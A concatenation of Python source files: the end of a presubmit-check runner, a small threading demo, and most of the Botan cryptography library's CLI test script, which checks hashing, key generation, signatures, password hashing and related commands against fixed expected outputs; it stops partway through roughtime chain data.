  if options.verbose >= 2:
    logging.basicConfig(level=logging.DEBUG)
  elif options.verbose:
    logging.basicConfig(level=logging.INFO)
  else:
    logging.basicConfig(level=logging.ERROR)

  change_class, files = load_files(options, args)
  if not change_class:
    parser.error('For unversioned directory, <files> is not optional.')
  logging.info('Found %d file(s).', len(files))

  gerrit_obj = None
  if options.gerrit_url and options.gerrit_fetch:
    # Pull author/description from Gerrit instead of the flags.
    assert options.issue and options.patchset
    gerrit_obj = GerritAccessor(urllib.parse.urlparse(options.gerrit_url).netloc)
    options.author = gerrit_obj.GetChangeOwner(options.issue)
    options.description = gerrit_obj.GetChangeDescription(options.issue,
                                                          options.patchset)
    logging.info('Got author: "%s"', options.author)
    logging.info('Got description: """\n%s\n"""', options.description)

  try:
    # Disable any canned checks the caller asked to skip, then run everything.
    with canned_check_filter(options.skip_canned):
      results = DoPresubmitChecks(
          change_class(options.name,
                       options.description,
                       options.root,
                       files,
                       options.issue,
                       options.patchset,
                       options.author,
                       upstream=options.upstream),
          options.commit,
          options.verbose,
          sys.stdout,
          sys.stdin,
          options.default_presubmit,
          options.may_prompt,
          gerrit_obj,
          options.dry_run,
          options.parallel)
    return not results.should_continue()
  except PresubmitFailure as e:
    print(e, file=sys.stderr)
    print('Maybe your depot_tools is out of date?', file=sys.stderr)
    return 2
if __name__ == '__main__':
  fix_encoding.fix_encoding()
  try:
    # main() returns a truthy value (True or 2) when checks fail.
    sys.exit(main())
  except KeyboardInterrupt:
    sys.stderr.write('interrupted\n')
    sys.exit(2)
|
threading_test.py | import threading
def calc_square(number, iter):
    """Print the square of *number*, repeated *iter* times."""
    squared = number * number
    count = 0
    while count < iter:
        print('Square:', squared)
        count += 1
def calc_quad(number, iter):
    """Print the fourth power of *number*, repeated *iter* times."""
    fourth = number * number * number * number
    remaining = iter
    while remaining > 0:
        print('Quad:', fourth)
        remaining -= 1
if __name__ == "__main__":
    number = 7
    # BUGFIX: thread2 previously aliased thread1 (thread2 = thread1), so the
    # same Thread object was start()ed twice -- which raises RuntimeError --
    # and calc_square never ran at all.  Create a distinct second thread.
    thread1 = threading.Thread(target=calc_quad, args=(number, 100000))
    thread2 = threading.Thread(target=calc_square, args=(number, 100000))
    # Will execute both in parallel
    thread1.start()
    thread2.start()
    # Joins threads back to the parent process, which is this
    # program
    thread1.join()
    thread2.join()
    # This program reduces the time of execution by running tasks in parallel
test_cli.py | #!/usr/bin/python
"""
(C) 2018,2019 Jack Lloyd
Botan is released under the Simplified BSD License (see license.txt)
"""
import subprocess
import sys
import os
import logging
import optparse # pylint: disable=deprecated-module
import time
import shutil
import tempfile
import re
import random
import json
import binascii
import multiprocessing
from multiprocessing.pool import ThreadPool
# pylint: disable=global-statement,unused-argument

# Absolute path of the botan CLI binary under test; presumably assigned by a
# driver/main() outside this chunk before any test runs -- verify in caller.
CLI_PATH = None

# Global counters: test_cli() bumps TESTS_RUN on every invocation, and
# TestLogHandler bumps TESTS_FAILED whenever an ERROR-level record is logged.
TESTS_RUN = 0
TESTS_FAILED = 0
class TestLogHandler(logging.StreamHandler, object):
    """Stream handler that tallies ERROR-or-worse records in TESTS_FAILED."""

    def emit(self, record):
        # Let the stock StreamHandler do the actual formatting and writing.
        super(TestLogHandler, self).emit(record)

        if record.levelno < logging.ERROR:
            return
        # Any error-level message counts as a failed test.
        global TESTS_FAILED
        TESTS_FAILED += 1
def setup_logging(options):
    """Configure the root logger level and attach the error-counting handler."""
    if options.verbose:
        level = logging.DEBUG
    elif options.quiet:
        level = logging.WARNING
    else:
        level = logging.INFO

    handler = TestLogHandler(sys.stdout)
    handler.setFormatter(logging.Formatter('%(levelname) 7s: %(message)s'))

    root = logging.getLogger()
    root.addHandler(handler)
    root.setLevel(level)
def random_port_number():
    """Return a random unprivileged port in [1024, 65535] inclusive."""
    return 1024 + random.randrange(64512)
def test_cli(cmd, cmd_options, expected_output=None, cmd_input=None, expected_stderr=None, use_drbg=True):
    """Run one CLI subcommand and optionally check its stdout/stderr.

    Args:
      cmd: name of the CLI subcommand, e.g. "hash".
      cmd_options: extra arguments, either a single space-separated string
        or a list; None means no extra arguments.
      expected_output: if not None, the stripped stdout must equal this
        exactly or an error is logged.
      cmd_input: if not None, this text is piped to the process on stdin.
      expected_stderr: expected raw stderr bytes; None means any stderr
        output at all is treated as an error.
      use_drbg: if True, pass a fixed-seed DRBG so output is deterministic.

    Returns:
      The ASCII-decoded, stripped stdout of the process.
    """
    global TESTS_RUN

    TESTS_RUN += 1

    opt_list = []

    if isinstance(cmd_options, str):
        opt_list = cmd_options.split(' ')
    elif isinstance(cmd_options, list):
        opt_list = cmd_options

    if use_drbg:
        # Fixed seed keeps "random" CLI output reproducible across runs.
        fixed_drbg_seed = "802" * 32
        drbg_options = ['--rng-type=drbg', '--drbg-seed=' + fixed_drbg_seed]
    else:
        drbg_options = []

    cmdline = [CLI_PATH, cmd] + drbg_options + opt_list

    # Log the command without the (noisy, constant) DRBG options.
    logging.debug("Executing '%s'" % (' '.join([CLI_PATH, cmd] + opt_list)))

    stdout = None
    stderr = None

    if cmd_input is None:
        proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (stdout, stderr) = proc.communicate()
    else:
        proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        (stdout, stderr) = proc.communicate(cmd_input.encode())

    if stderr:
        if expected_stderr is None:
            logging.error("Got output on stderr %s (stdout was %s)", stderr, stdout)
        else:
            if stderr != expected_stderr:
                logging.error("Got output on stderr %s which did not match expected value %s", stderr, expected_stderr)
    else:
        if expected_stderr is not None:
            logging.error('Expected output on stderr but got nothing')

    output = stdout.decode('ascii').strip()

    if expected_output is not None:
        if output != expected_output:
            logging.error("Got unexpected output running cmd %s %s", cmd, cmd_options)
            logging.info("Output lengths %d vs expected %d", len(output), len(expected_output))
            logging.info("Got %s", output)
            logging.info("Exp %s", expected_output)

    return output
def check_for_command(cmd):
    """Return True if the CLI binary was built with support for *cmd*."""
    proc = subprocess.Popen([CLI_PATH, 'has_command', cmd])
    proc.communicate()
    return proc.returncode == 0
def cli_config_tests(_tmp_dir):
    """Sanity-check the build-config reporting subcommands."""
    prefix = test_cli("config", "prefix")
    cflags = test_cli("config", "cflags")
    ldflags = test_cli("config", "ldflags")
    libs = test_cli("config", "libs")

    if len(prefix) < 4 or not prefix.startswith('/'):
        logging.error("Bad prefix %s" % (prefix))
    if ("-I%s/include/botan-2" % (prefix)) not in cflags:
        logging.error("Bad cflags %s" % (cflags))
    if not ldflags.endswith("-L%s/lib" % (prefix)):
        logging.error("Bad ldflags %s" % (ldflags))
    if "-lbotan-2" not in libs:
        logging.error("Bad libs %s" % (libs))
def cli_help_tests(_tmp_dir):
    """Smoke-test that 'help' prints a substantial amount of text."""
    help_text = test_cli("help", None, None)

    # Maybe test format somehow??
    if len(help_text) < 500:
        logging.error("Help output seems very short")
def cli_version_tests(_tmp_dir):
    """Check both the short and --full version output formats."""
    short_re = re.compile(r'[0-9]\.[0-9]+\.[0-9]')
    reported = test_cli("version", None, None)
    if not short_re.match(reported):
        logging.error("Unexpected version output %s" % (reported))

    full_re = re.compile(r'Botan [0-9]\.[0-9]+\.[0-9] \(.* revision .*, distribution .*\)$')
    reported = test_cli("version", ["--full"], None, None)
    if not full_re.match(reported):
        logging.error("Unexpected version output %s" % (reported))
def cli_is_prime_tests(_tmp_dir):
    """Check primality verdicts for small known inputs."""
    vectors = [
        ("5", "5 is probably prime"),
        ("9", "9 is composite"),
        ("548950623407687320763", "548950623407687320763 is probably prime"),
    ]
    for number, verdict in vectors:
        test_cli("is_prime", number, verdict)
def cli_gen_prime_tests(_tmp_dir):
    """gen_prime with the fixed DRBG must be fully deterministic."""
    for bits, expected in (("64", "15568813029901363163"),
                           ("128", "287193909494025008847286845478788766073")):
        test_cli("gen_prime", bits, expected)
def cli_cycle_counter(_tmp_dir):
    """cpu_clock either reports no counter or a plausible clock estimate."""
    reported = test_cli("cpu_clock", None, None)

    clock_re = re.compile(r'Estimated CPU clock [0-9\.]+ (M|G)Hz')
    no_counter = reported.startswith('No CPU cycle counter on this machine')

    if not (no_counter or clock_re.match(reported)):
        logging.error('Unexpected output from cpu_clock: %s', reported)
def cli_entropy_tests(_tmp_dir):
    """Validate the alternating status/sample line structure of 'entropy all'."""
    report = test_cli("entropy", ["all"], None)

    status_re = re.compile('Polling [a-z0-9_]+ gathered [0-9]+ bytes in [0-9]+ outputs with estimated entropy [0-9]+')
    unavail_re = re.compile('Source [a-z0-9_]+ is unavailable')
    comp_re = re.compile('Sample from [a-z0-9_]+ was .* compressed from [0-9]+ bytes to [0-9]+ bytes')
    sample_re = re.compile(r'[A-F0-9]+(...)?')

    expecting_status = True
    for line in report.split('\n'):
        # Compression notes may appear anywhere and do not advance the state.
        if comp_re.match(line):
            continue
        if not expecting_status:
            if sample_re.match(line) is None:
                logging.error('Unexpected sample line %s', line)
            expecting_status = True
            continue
        if status_re.match(line) is not None:
            # A status line is followed by a sample line.
            expecting_status = False
        elif unavail_re.match(line) is not None:
            # Unavailable sources produce no sample line; keep expecting status.
            pass
        else:
            logging.error('Unexpected status line %s', line)
            expecting_status = False
def cli_factor_tests(_tmp_dir):
    """Check integer factoring on a prime and two semiprimes."""
    vectors = [
        ("97", "97: 97"),
        ("9753893489562389", "9753893489562389: 21433 455087644733"),
        ("12019502040659149507", "12019502040659149507: 3298628633 3643787579"),
    ]
    for number, factorization in vectors:
        test_cli("factor", number, factorization)
def cli_mod_inverse_tests(_tmp_dir):
    """Check modular inverse; 98 shares a factor with 802 so 0 is printed."""
    for args, expected in (("97 802", "339"), ("98 802", "0")):
        test_cli("mod_inverse", args, expected)
def cli_base64_tests(_tmp_dir):
    """Round-trip a short string through base64 via stdin ('-')."""
    for cmd, expected, stdin_data in (("base64_enc", "YmVlcyE=", "bees!"),
                                      ("base64_dec", "bees!", "YmVlcyE=")):
        test_cli(cmd, "-", expected, stdin_data)
def cli_base32_tests(_tmp_dir):
    """Round-trip a short string through base32 via stdin ('-')."""
    for cmd, expected, stdin_data in (("base32_enc", "MJSWK4ZB", "bees!"),
                                      ("base32_dec", "bees!", "MJSWK4ZB")):
        test_cli(cmd, "-", expected, stdin_data)
def cli_base58_tests(_tmp_dir):
    """Round-trip base58 and base58check encodings via stdin."""
    vectors = [
        ("base58_enc", "-", "C6sRAr4", "bees!"),
        ("base58_dec", "-", "bees!", "C6sRAr4"),
        ("base58_enc", ["--check", "-"], "Cjv15cdjaBc", "F00F"),
        ("base58_dec", ["--check", "-"], "F00F", "Cjv15cdjaBc"),
    ]
    for cmd, opts, expected, stdin_data in vectors:
        test_cli(cmd, opts, expected, stdin_data)
def cli_hex_tests(_tmp_dir):
    """Round-trip a short string through hex via stdin ('-')."""
    for cmd, expected, stdin_data in (("hex_enc", "6265657321", "bees!"),
                                      ("hex_dec", "bees!", "6265657321")):
        test_cli(cmd, "-", expected, stdin_data)
def cli_hash_tests(_tmp_dir):
    """Hash known vectors with several algorithms and output encodings."""
    vectors = [
        ("--algo=SHA-256",
         "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 -", ""),
        ("--algo=SHA-256",
         "BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD -", "abc"),
        (["--algo=SHA-256", "--format=base64"],
         "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= -", "abc"),
        (["--algo=SHA-224", "--format=base58", "--no-fsname"],
         "MuGc8HkSVyJjfMjPM5UQikPToBTzNucEghcGLe", "abc"),
        (["--algo=SHA-224", "--format=base58check", "--no-fsname"],
         "3MmfMqgrhemdVa9bDAGfooukbviWtKMBx2xauL2RsyAe", "abc"),
    ]
    for opts, expected, stdin_data in vectors:
        test_cli("hash", opts, expected, stdin_data)
def cli_hmac_tests(tmp_dir):
    """Generate a key file with the fixed DRBG and HMAC it with itself."""
    key_file = os.path.join(tmp_dir, 'hmac.key')

    expected_mac = "E3A8529377030B28A7DBDFC50DDEC8E4ECEFB6EA850D95EB785938CD3E3AFEF9EF8B08AF219C1496633193468AB755CB"

    test_cli("rng", ["64", "--output=%s" % (key_file)], "")
    test_cli("hmac", ["--no-fsname", "--hash=SHA-384", key_file, key_file],
             expected_mac)
def cli_bcrypt_tests(_tmp_dir):
    """Check deterministic bcrypt generation plus password verification."""
    test_cli("gen_bcrypt", "--work-factor=4 s3kr1t",
             "$2a$04$0.8G7o08XYwvBBWA3l0WUujtwoGZgGDzVSN8fNkNqXikcK4A3lHPS")

    stored_hash = "$2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka"
    test_cli("check_bcrypt", "s3kr1t " + stored_hash, "Password is valid")
    test_cli("check_bcrypt", "santa " + stored_hash, "Password is NOT valid")
def cli_argon2_tests(_tmp_dir):
    """Check Argon2id generation is deterministic and verification works."""
    password = "s3kr1t"
    expected = "$argon2id$v=19$m=8,t=1,p=1$2A+I9q2+ZayxDDYC5n2YWw$/Lhx+Jbtlpw+Kxpskfv7+AKhBL/5ebalTJkVC1O5+1E"

    # Defaults t=1 and p=1 must produce the same hash as the explicit flags.
    for opts in (['--mem=8'],
                 ['--mem=8', '--t=1'],
                 ['--mem=8', '--t=1', '--p=1']):
        test_cli("gen_argon2", opts + [password], expected)

    test_cli("check_argon2", [password, expected], "Password is valid")
    test_cli("check_argon2", ["guessing", expected], "Password is NOT valid")
def cli_gen_dl_group_tests(_tmp_dir):
    """Check deterministic discrete-log group generation (fixed DRBG seed)."""

    # Expected 1043-bit DH parameters under the fixed DRBG seed.
    pem = """-----BEGIN X9.42 DH PARAMETERS-----
MIIBJAKBgwTw7LQiLkXJsrgMVQxTPlWaQlYz/raZ+5RtIZe4YluQgRQGPFADLZ/t
TOYzuIzZJFOcdKtEtrVkxZRGSkjZwKFKLUD6fzSjoC2M2EHktK/y5HsvxBxL4tKr
q1ffbyPQi+iBLYTZAXygvxj2vWyrvA+/w4nbt1fStCHTDhWjLWqFpV9nAoGDAKzA
HUu/IRl7OiUtW/dz36gzEJnaYtz4ZtJl0FG8RJiOe02lD8myqW2sVzYqMvKD0LGx
x9fdSKC1G+aZ/NWtqrQjb66Daf7b0ddDx+bfWTWJ2dOtZd8IL2rmQQJm+JogDi9i
huVYFicDNQGzi+nEKAzrZ1L/VxtiSiw/qw0IyOuVtz8CFjgPiPatvmWssQw2AuZ9
mFvAZ/8wal0=
-----END X9.42 DH PARAMETERS-----"""

    test_cli("gen_dl_group", "--pbits=1043", pem)

    # DSA-style group generation must also be deterministic.
    dsa_grp = """-----BEGIN X9.42 DH PARAMETERS-----
MIIBHgKBgQCyP1vosC/axliM2hmJ9EOSdd1zBkuzMP25CYD8PFkRVrPLr1ClSUtn
eXTIsHToJ7d7sRwtidQGW9BrvUEyiAWE06W/wnLPxB3/g2/l/P2EhbNmNHAO7rV7
ZVz/uKR4Xcvzxg9uk5MpT1VsxA8H6VEwzefNF1Rya92rqGgBTNT3/wKBgC7HLL8A
Gu3tqJxTk1iNgojjOiSreLn6ihA8R8kQnRXDTNtDKz996KHGInfMBurUI1zPM3xq
bHc0CvU1Nf87enhPIretzJcFgiCWrNFUIC25zPEjp0s3/ERHT4Bi1TABZ3j6YUEQ
fnnj+9XriKKHf2WtX0T4FXorvnKq30m934rzAhUAvwhWDK3yZEmphc7dwl4/J3Zp
+MU=
-----END X9.42 DH PARAMETERS-----"""

    test_cli("gen_dl_group", ["--type=dsa", "--pbits=1024"], dsa_grp)
def cli_key_tests(tmp_dir):
    """Exercise keygen, PKCS #8 export/import, fingerprints, sign/verify,
    and the X.509 self-signed CA / request / signed-cert workflow.

    All "random" values come from the fixed-seed DRBG, so keys and
    fingerprints are exact expected constants.
    """
    # ECDSA secp256k1 private key the seeded DRBG must reproduce exactly.
    pem = """-----BEGIN PRIVATE KEY-----
MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQg2A+I9q2+ZayxDDYC5n2Y
W8Bn/zBm4D3mwS5qMwADRDehRANCAATwnDFqsjXL9SD/Rr1Vy4pb79PswXdQNZBN
mlLtJ5JvZ0/p6zP3x+Y9yPIrAR8L/acG5ItSrAKXzzuqQQZMv4aN
-----END PRIVATE KEY-----"""

    # Scratch file locations inside the per-test temp directory.
    priv_key = os.path.join(tmp_dir, 'priv.pem')
    pub_key = os.path.join(tmp_dir, 'pub.pem')
    pub_der_key = os.path.join(tmp_dir, 'pub.der')
    enc_pem = os.path.join(tmp_dir, 'priv_enc.pem')
    enc_der = os.path.join(tmp_dir, 'priv_enc.der')
    ca_cert = os.path.join(tmp_dir, 'ca.crt')
    crt_req = os.path.join(tmp_dir, 'crt.req')
    user_cert = os.path.join(tmp_dir, 'user.crt')

    test_cli("keygen", ["--algo=ECDSA", "--params=secp256k1"], pem)
    test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "")

    # Export the public key (PEM and DER) and password-protected private keys.
    test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "")
    test_cli("pkcs8", "--pub-out --der-out --output=%s %s" % (pub_der_key, priv_key), "")
    test_cli("pkcs8", "--pass-out=foof --der-out --output=%s %s" % (enc_der, priv_key), "")
    test_cli("pkcs8", "--pass-out=foof --output=%s %s" % (enc_pem, priv_key), "")

    # Decrypting either encoding must recover the same key.
    dec_pem = test_cli("pkcs8", ["--pass-in=foof", enc_pem], None)
    dec_der = test_cli("pkcs8", ["--pass-in=foof", enc_der], None)

    if dec_pem != dec_der:
        logging.error("Problem decrypting PKCS8 key")

    # Same fingerprint whether the input is PEM, DER, multiple files or stdin.
    test_cli("fingerprint", ['--no-fsname', pub_key],
             "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")

    test_cli("fingerprint", ['--no-fsname', pub_der_key],
             "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")

    test_cli("fingerprint", ['--no-fsname', pub_key, pub_der_key],
             "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4\n"
             "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")

    # Without --no-fsname the file name prefixes the fingerprint.
    test_cli("fingerprint", [pub_der_key],
             pub_der_key +
             ": 83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4")

    test_cli("fingerprint", ['-'],
             "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4",
             open(pub_key, 'rb').read().decode())

    valid_sig = "nI4mI1ec14Y7nYUWs2edysAVvkob0TWpmGh5rrYWDA+/W9Fj0ZM21qJw8qa3/avAOIVBO6hoMEVmfJYXlS+ReA=="

    test_cli("sign", "--provider=base %s %s" % (priv_key, pub_key), valid_sig)

    test_cli("verify", [pub_key, pub_key, '-'],
             "Signature is valid", valid_sig)

    # A corrupted signature must fail verification.
    test_cli("verify", [pub_key, pub_key, '-'],
             "Signature is invalid",
             valid_sig.replace("G", "H"))

    test_cli("gen_self_signed",
             [priv_key, "CA", "--ca", "--country=VT",
              "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert],
             "")

    # A self-signed CA alone cannot be chained to a trust root.
    test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust")

    cert_info = test_cli("cert_info", ['--fingerprint', ca_cert], None)

    if cert_info.find('Subject: CN="CA",C="VT"') < 0:
        logging.error('Unexpected output for cert_info command %s', cert_info)
    if cert_info.find('Subject keyid: 69DD911C9EEE3400C67CBC3F3056CBE711BD56AF9495013F') < 0:
        logging.error('Unexpected output for cert_info command %s', cert_info)

    # Issue a request, sign it with the CA, and verify the resulting chain.
    test_cli("gen_pkcs10", "%s User --output=%s" % (priv_key, crt_req))

    test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, user_cert))

    test_cli("cert_verify", [user_cert, ca_cert],
             "Certificate passes validation checks")

    # Without the CA cert present the issuer cannot be located.
    test_cli("cert_verify", user_cert,
             "Certificate did not validate - Certificate issuer not found")
def cli_xmss_sign_tests(tmp_dir):
    """Check XMSS keygen/sign/verify, and that the stateful private key
    changes after every signature while the public key stays fixed.

    All hashes below are exact because the DRBG seed is fixed.
    """
    priv_key = os.path.join(tmp_dir, 'priv.pem')
    pub_key = os.path.join(tmp_dir, 'pub.pem')
    pub_key2 = os.path.join(tmp_dir, 'pub2.pem')
    msg = os.path.join(tmp_dir, 'input')
    sig1 = os.path.join(tmp_dir, 'sig1')
    sig2 = os.path.join(tmp_dir, 'sig2')

    # rng with no count writes an empty message file -- the expected digest
    # below is the SHA-256 of the empty string.
    test_cli("rng", ['--output=%s' % (msg)], "")
    test_cli("hash", ["--no-fsname", msg], "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855")

    test_cli("keygen", ["--algo=XMSS", "--output=%s" % (priv_key)], "")
    test_cli("hash", ["--no-fsname", priv_key], "5B38F737BA41BE7F40433DB30EAEF7C41ABB0F7D9E7A09DEB5FDCE7B6811693F")

    test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "")
    test_cli("fingerprint", ['--no-fsname', pub_key],
             "B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22")

    # verify the key is updated after each signature:
    test_cli("sign", [priv_key, msg, "--output=%s" % (sig1)], "")
    test_cli("verify", [pub_key, msg, sig1], "Signature is valid")
    test_cli("hash", ["--no-fsname", sig1], "04AF45451C7A9AF2D828E1AD6EC262E012436F4087C5DA6F32C689D781E597D0")
    test_cli("hash", ["--no-fsname", priv_key], "67929FAEC636E43DE828C1CD7E2D11CE7C3388CE90DD0A0F687C6627FFA850CD")

    test_cli("sign", [priv_key, msg, "--output=%s" % (sig2)], "")
    test_cli("verify", [pub_key, msg, sig2], "Signature is valid")
    test_cli("hash", ["--no-fsname", sig2], "0785A6AD54CC7D01F2BE2BC6463A3EAA1159792E52210ED754992C5068E8F24F")
    test_cli("hash", ["--no-fsname", priv_key], "1940945D68B1CF54D79E05DD7913A4D0B4959183F1E12B81A4E43EF4E63FBD20")

    # private key updates, public key is unchanged:
    test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key2, priv_key), "")
    test_cli("fingerprint", ['--no-fsname', pub_key2],
             "B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22")
def cli_pbkdf_tune_tests(_tmp_dir):
    """Check pbkdf_tune output format for Scrypt, PBKDF2 and Argon2id."""
    if not check_for_command("pbkdf_tune"):
        return

    # (extra CLI args, expected per-line pattern) for each KDF variant.
    checks = [
        ([],
         r'For (default|[1-9][0-9]*) ms selected Scrypt\([0-9]+,[0-9]+,[0-9]+\) using [0-9]+ MiB'),
        (["--algo=PBKDF2(SHA-256)"],
         r'For (default|[1-9][0-9]*) ms selected PBKDF2\(HMAC\(SHA-256\),[0-9]+\)'),
        (["--algo=Argon2id"],
         r'For (default|[1-9][0-9]*) ms selected Argon2id\([0-9]+,[0-9]+,[0-9]+\)'),
    ]

    for extra_args, pattern in checks:
        matcher = re.compile(pattern)
        report = test_cli("pbkdf_tune",
                          extra_args + ["--check", "1", "10", "50", "default"],
                          None).split('\n')
        for line in report:
            if matcher.match(line) is None:
                logging.error("Unexpected line '%s'" % (line))
def cli_psk_db_tests(tmp_dir):
    """Exercise the encrypted PSK database set/get/list commands."""
    if not check_for_command("psk_get"):
        return

    psk_db = os.path.join(tmp_dir, 'psk.db')
    key_a = "909" * 32
    key_b = "451" * 32

    for db_key, name, value in [(key_a, "name", "F00FEE"),
                                (key_b, "name", "C00FEE11"),
                                (key_a, "name2", "50051029")]:
        test_cli("psk_set", [psk_db, db_key, name, value], "")

    test_cli("psk_get", [psk_db, key_a, "name"], "F00FEE")
    test_cli("psk_get", [psk_db, key_b, "name"], "C00FEE11")

    # Listing is scoped to the database key used to store each entry.
    test_cli("psk_list", [psk_db, key_a], "name\nname2")
    test_cli("psk_list", [psk_db, key_b], "name")
def cli_compress_tests(tmp_dir):
    """Round-trip a small file through the compress/decompress commands,
    checking the gzip magic bytes and the recovered content."""
    if not check_for_command("compress"):
        return

    input_file = os.path.join(tmp_dir, 'input.txt')
    output_file = os.path.join(tmp_dir, 'input.txt.gz')

    # Fixed: the original called f.close() inside the 'with' block, which is
    # redundant -- the context manager already closes the file.
    with open(input_file, 'w') as f:
        f.write("hi there")

    test_cli("compress", input_file)

    if not os.access(output_file, os.R_OK):
        # Fixed grammar of the error message ("did not created").
        logging.error("Compression did not create expected output file")

    is_py3 = sys.version_info[0] == 3

    # Fixed: read the header via a context manager instead of leaking the
    # handle from a bare open(...).read(2).
    with open(output_file, 'rb') as f:
        output_hdr = f.read(2)

    # 0x1F 0x8B is the two-byte gzip magic number.
    if is_py3:
        if output_hdr[0] != 0x1F or output_hdr[1] != 0x8B:
            logging.error("Did not see expected gzip header")
    else:
        # On py2 read() yields str, so the bytes must be ord()'d first.
        if ord(output_hdr[0]) != 0x1F or ord(output_hdr[1]) != 0x8B:
            logging.error("Did not see expected gzip header")

    os.unlink(input_file)

    test_cli("decompress", output_file)

    if not os.access(input_file, os.R_OK):
        logging.error("Decompression did not create expected output file")

    # Fixed: close the recovered file instead of leaking the handle.
    with open(input_file) as f:
        recovered = f.read()
    if recovered != "hi there":
        logging.error("Decompression did not recover original input")
def cli_rng_tests(_tmp_dir):
    """Check deterministic DRBG output, then the non-deterministic sources."""
    # With the fixed DRBG seed these byte strings are exact.
    test_cli("rng", "10", "D80F88F6ADBE65ACB10C")
    test_cli("rng", "16", "D80F88F6ADBE65ACB10C3602E67D985B")
    test_cli("rng", "10 6", "D80F88F6ADBE65ACB10C\n1B119CC068AF")

    test_cli("rng", ['--format=base64', '10'], "2A+I9q2+ZayxDA==")
    test_cli("rng", ['--format=base58', '10'], "D93XRyVfxqs7oR")
    test_cli("rng", ['--format=base58check', '10'], "2NS1jYUq92TyGFVnhVLa")

    ten_hex_bytes = re.compile('[A-F0-9]{20}')

    # Real entropy sources must not echo the DRBG stream and must be hex.
    for source in ['system', 'auto', 'entropy']:
        sample = test_cli("rng", ["10", '--%s' % (source)], use_drbg=False)

        if sample == "D80F88F6ADBE65ACB10C":
            logging.error('RNG produced DRBG output')
        if ten_hex_bytes.match(sample) is None:
            logging.error('Unexpected RNG output %s' % (sample))

    if test_cli("cpuid", []).find(' rdrand ') > 0:
        sample = test_cli("rng", ["10", '--rdrand'], use_drbg=False)

        if sample == "D80F88F6ADBE65ACB10C":
            logging.error('RDRAND produced DRBG output')
        if ten_hex_bytes.match(sample) is None:
            logging.error('Unexpected RNG output %s' % (sample))
def cli_roughtime_check_tests(tmp_dir):
    """Verify the roughtime_check command against stored server chains:
    a valid five-link chain, raw-time output, and a corrupted-key failure."""
    # pylint: disable=line-too-long
    if not check_for_command("roughtime_check"):
        return
    chain = os.path.join(tmp_dir, 'roughtime-chain')

    # Five-link chain captured from real servers; the timestamps asserted
    # below correspond to these recorded responses.
    with open(chain, 'w') as f:
        f.write("""\
ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA
